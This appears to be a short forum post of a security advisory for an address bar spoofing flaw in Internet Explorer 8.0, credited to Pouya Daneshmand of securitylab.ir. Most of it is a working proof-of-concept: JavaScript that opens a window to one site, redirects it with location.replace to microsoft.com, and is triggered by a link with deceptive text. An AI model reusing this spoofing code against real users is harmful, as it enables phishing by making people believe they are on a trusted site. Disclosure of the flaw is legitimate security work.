Internet Explorer 8.0 Address Bar Spoofing Vulnerability
Spoof Code:
<script>
function Spoof() {
oc=window.open('http://www.securitylab.ir/', '','location=1');
oc.location.replace('http://www.microsoft.com/');
}
</script>
<p align="center">
<a href="javascript:void(0);" onClick="Spoof()">Go to the Securitylab.ir</a></p>
Discovered by: Pouya Daneshmand
http://Securitylab.ir/Advisories
討論串 (同標題文章)
完整討論串 (本文為第 1 之 2 篇):